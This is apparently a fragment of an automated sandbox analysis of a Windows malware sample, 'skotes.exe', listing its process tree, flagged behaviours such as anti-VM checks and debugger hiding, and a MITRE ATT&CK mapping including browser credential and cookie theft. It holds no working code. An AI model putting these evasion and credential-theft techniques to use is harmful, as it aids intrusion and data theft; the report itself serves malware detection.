C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E0
1⤵
PID:5260

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3588

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3116 -ip 3116
1⤵
PID:1884

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 1560 -ip 1560
1⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4148

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4884

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion